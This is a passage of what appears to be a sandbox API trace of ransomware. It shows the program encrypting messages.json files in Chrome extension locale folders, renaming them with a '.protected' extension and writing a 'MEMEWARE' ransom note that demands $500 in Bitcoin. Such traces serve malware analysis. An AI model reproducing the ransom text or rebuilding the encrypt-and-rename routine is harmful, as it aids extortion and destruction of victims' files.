(lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.149] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.149] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\..") returned 147 [0080.149] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.149] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.149] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.149] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.149] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.149] lstrcmpiW (lpString1="messages.json", lpString2="Program Files 
(x86)") returned -1 [0080.149] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.149] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.149] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.149] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.149] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.149] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.149] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.149] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.150] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.150] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.150] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.150] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0080.150] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.150] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0080.150] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.151] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0080.151] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.151] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.151] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.151] CloseHandle (hObject=0x168) returned 1 [0080.151] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.protected") returned 168 [0080.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0080.152] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.152] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.152] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 162 [0080.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0080.152] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.152] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.153] lstrlenA (lpString="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") returned 684 [0080.153] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0080.153] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.153] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.153] CloseHandle (hObject=0x164) returned 1 [0080.153] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.153] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0080.153] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0080.153] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0080.153] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0080.153] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0080.153] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro") returned 141 [0080.153] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0080.154] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0080.154] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\*") returned 143 [0080.154] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0080.154] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.154] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.154] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.154] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.154] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.154] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\.") returned 143 [0080.154] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.154] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.154] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.154] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.154] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.154] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.154] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.154] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\..") returned 144 [0080.154] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.154] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.154] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.154] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.154] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.154] lstrcmpiW (lpString1="messages.json", lpString2="Program Files 
(x86)") returned -1 [0080.154] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.154] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.154] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json") returned 155 [0080.154] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.154] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.154] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.154] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.155] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json") returned 155 [0080.155] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.155] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json") returned 155 [0080.155] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.155] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json") returned 155 [0080.155] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.155] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.156] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.156] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0080.156] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.156] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.156] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.156] CloseHandle (hObject=0x168) returned 1 [0080.156] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.protected") returned 165 [0080.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.protected")) returned 1 [0080.157] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.157] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.157] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\RESTORE_FILES.txt") returned 159 [0080.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.157] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.157] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.158] lstrlenA (lpString="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") returned 684 [0080.158] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.158] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.158] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.158] CloseHandle (hObject=0x164) returned 1 [0080.158] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.158] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0080.158] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0080.158] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0080.158] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0080.159] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0080.159] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru") returned 141 [0080.159] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0080.159] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0080.159] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\*") returned 143 [0080.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.159] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0080.159] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.159] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.159] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.159] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.159] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\.") returned 143 [0080.159] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.159] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.159] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.159] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.159] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.159] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.159] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.159] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\..") returned 144 [0080.159] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.159] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.159] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.159] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.159] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.159] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0080.159] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.159] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.159] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json") returned 155 [0080.159] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.159] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.160] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.160] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json") returned 155 [0080.160] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.160] lstrlenW 